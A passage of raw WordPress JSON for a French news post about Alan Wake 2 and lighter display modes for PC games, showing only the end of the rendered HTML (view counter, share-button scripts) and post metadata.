12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> &nbsp;1,498&nbsp;total views, &nbsp;1&nbsp;views today<\/p>\n<div class=\"pvc_clear\"><\/div>\n<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Alan Wake 2 Met en \u00c9vidence le Besoin de Modes d&#039;Affichage All\u00e9g\u00e9s pour les Jeux PC\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>","protected":false},"author":1,"featured_media":14711,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2242],"tags":[],"class_list":["post-14710","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-divers"],"_links":{"self":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts\/14710"}],"collection":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/comments?post=14710"}],"version-history":[{"count":0,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/posts\/14710\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/media\/14711"}],"wp:attachment":[{"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/media?parent=14710"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/categories?post=14710"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lapressedefrance.fr\/news\/wp-json\/wp\/v2\/tags?post=14710"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}